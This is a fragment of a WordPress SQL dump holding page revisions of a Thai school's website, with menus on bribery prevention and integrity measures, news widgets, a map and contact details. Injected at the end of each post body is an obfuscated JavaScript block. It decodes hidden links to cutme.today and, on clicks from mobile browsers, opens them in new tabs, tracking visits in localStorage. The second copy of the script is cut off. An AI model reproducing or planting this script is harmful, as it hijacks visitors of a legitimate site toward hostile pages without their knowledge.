900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-30 11:55:21','2024-07-30 04:55:21','',14,'http://pakhaeng.ssk.in.th/?p=299',0,'revision','',0),
(300,1,'2024-07-31 10:31:29','2024-07-31 03:31:29','<!-- wp:paragraph -->\n<p>สุขาดี มีความสุข</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":293} -->\n<figure class=\"wp-block-video\"><video autoplay controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/441527005_441923068779713_3712436577410634971_n.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 